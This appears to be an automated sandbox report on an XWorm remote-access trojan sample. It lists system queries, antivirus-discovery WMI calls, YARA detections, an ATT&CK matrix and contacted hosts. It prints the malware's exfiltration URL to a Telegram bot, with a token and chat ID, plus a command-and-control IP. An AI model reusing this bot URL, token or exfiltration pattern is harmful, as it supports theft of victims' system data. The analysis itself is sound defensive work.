Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\0720XW	Queries volume information: C:\Users\user\AppData\Roaming\0720XW VolumeInformation
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\0720XW	Queries volume information: C:\Users\user\AppData\Roaming\0720XW VolumeInformation

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Or3dzp4vB1.exe, 00000000.00000002.2518894545.000000001BBA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rogramFiles%\Windows Defender\MsMpeng.exe
Source: Or3dzp4vB1.exe, 00000000.00000002.2518894545.000000001BBA0000.00000004.00000020.00020000.00000000.sdmp, Or3dzp4vB1.exe, 00000000.00000002.2477373667.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp, Or3dzp4vB1.exe, 00000000.00000002.2525940345.000000001CCAE000.00000004.00000020.00020000.00000000.sdmp, Or3dzp4vB1.exe, 00000000.00000002.2525940345.000000001CC75000.00000004.00000020.00020000.00000000.sdmp, Or3dzp4vB1.exe, 00000000.00000002.2525940345.000000001CC9C000.00000004.00000020.00020000.00000000.sdmp, Or3dzp4vB1.exe, 00000000.00000002.2477373667.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Or3dzp4vB1.exe, 00000000.00000002.2518894545.000000001BBA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: Or3dzp4vB1.exe PID: 7300, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Or3dzp4vB1.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Or3dzp4vB1.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1230942361.0000000000A82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Or3dzp4vB1.exe PID: 7300, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\0720XW, type: DROPPED

Remote Access Functionality

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: Or3dzp4vB1.exe PID: 7300, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Or3dzp4vB1.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Or3dzp4vB1.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1230942361.0000000000A82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Or3dzp4vB1.exe PID: 7300, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\0720XW, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	23 System Information Discovery	Remote Desktop Protocol	1 Clipboard Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	21 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	11 Obfuscated Files or Information	Security Account Manager	231 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Registry Run Keys / Startup Folder	2 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	141 Virtualization/Sandbox Evasion	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	21 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	14 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	141 Virtualization/Sandbox Evasion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
Or3dzp4vB1.exe	84%	ReversingLabs	ByteCode-MSIL.Backdoor.XWorm
Or3dzp4vB1.exe	100%	Avira	TR/Spy.Gen
Or3dzp4vB1.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\0720XW	100%	Avira	TR/Spy.Gen
C:\Users\user\AppData\Roaming\0720XW	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\0720XW	84%	ReversingLabs	ByteCode-MSIL.Backdoor.XWorm

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://api.telegram.org	0%	Avira URL Cloud	safe
https://g.live.com/odclientsettings/ProdV21C:	0%	Avira URL Cloud	safe
http://crl.ver)	0%	Avira URL Cloud	safe
185.196.10.235	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
http://www.microsoft.co	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Avira URL Cloud	safe
http://www.microsoft.	0%	Avira URL Cloud	safe
http://crl.mic	0%	Avira URL Cloud	safe
https://api.telegram.org/bot7028702028:AAEx2DgaoQW4ZJEFV04T7CiZMjpq2vEnODs/sendMessage?chat_id=6857243638&text=%E2%98%A0%20%5BXWorm%20V5.4%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A14ADFDFE8FE6B38195AF%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%209YUNKW3%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%200720	0%	Avira URL Cloud	safe
http://crl.micM;	0%	Avira URL Cloud	safe
https://g.live.com/odclientsettings/Prod1C:	0%	Avira URL Cloud	safe
https://api.telegram.org/bot7028702028:AAEx2DgaoQW4ZJEFV04T7CiZMjpq2vEnODs/sendMessage?chat_id=68572	0%	Avira URL Cloud	safe
https://.VisualC	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
http://crl.mic?8	0%	Avira URL Cloud	safe
http://crl.m(l	0%	Avira URL Cloud	safe
http://crl.micros	0%	Avira URL Cloud	safe
http://www.microsoft.co3	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.telegram.org	149.154.167.220	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot7028702028:AAEx2DgaoQW4ZJEFV04T7CiZMjpq2vEnODs/sendMessage?chat_id=6857243638&text=%E2%98%A0%20%5BXWorm%20V5.4%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A14ADFDFE8FE6B38195AF%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%209YUNKW3%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%200720	true	Avira URL Cloud: safe	unknown
185.196.10.235	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.1281766413.0000017A90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1371294998.000001E8AD496000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1545020931.00000224AD0B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1739005715.000001662E002000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	Or3dzp4vB1.exe, 00000000.00000002.2485100318.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000011.00000002.1608470648.000001661E1B9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot	Or3dzp4vB1.exe, 0720XW.0.dr	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000002.00000002.1266561753.0000017A80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1318264431.000001E89D649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1446620025.000002249D26A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1608470648.000001661E1B9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000011.00000002.1608470648.000001661E1B9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.co	powershell.exe, 0000000B.00000002.1386984770.000001E8B58A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1571333595.00000224B5857000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000011.00000002.1739005715.000001662E002000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.mic	powershell.exe, 0000000B.00000002.1389137672.000001E8B5A0D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000011.00000002.1739005715.000001662E002000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.live.com/odclientsettings/ProdV21C:	svchost.exe, 0000001A.00000003.1925125933.000001C43D230000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr, edb.log.26.dr	false	Avira URL Cloud: safe	unknown
http://crl.ver)	svchost.exe, 0000001A.00000002.2483028491.000001C437CCD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.	powershell.exe, 00000011.00000002.1765571811.0000016636470000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000011.00000002.1608470648.000001661E1B9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/Prod1C:	edb.log.26.dr	false	Avira URL Cloud: safe	unknown
http://crl.m(l	powershell.exe, 0000000F.00000002.1569980075.00000224B5803000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000002.00000002.1266561753.0000017A80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1318264431.000001E89D649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1446620025.000002249D26A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1608470648.000001661E1B9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000011.00000002.1739005715.000001662E002000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.1281766413.0000017A90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1371294998.000001E8AD496000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1545020931.00000224AD0B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1739005715.000001662E002000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.microsoft.co3	powershell.exe, 00000011.00000002.1765571811.0000016636470000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.micM;	powershell.exe, 0000000B.00000002.1389137672.000001E8B5A0D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://.VisualC	powershell.exe, 00000002.00000002.1289901130.0000017AF7750000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000002.00000002.1266561753.0000017A80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1318264431.000001E89D421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1446620025.000002249D041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1608470648.000001661DF91000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
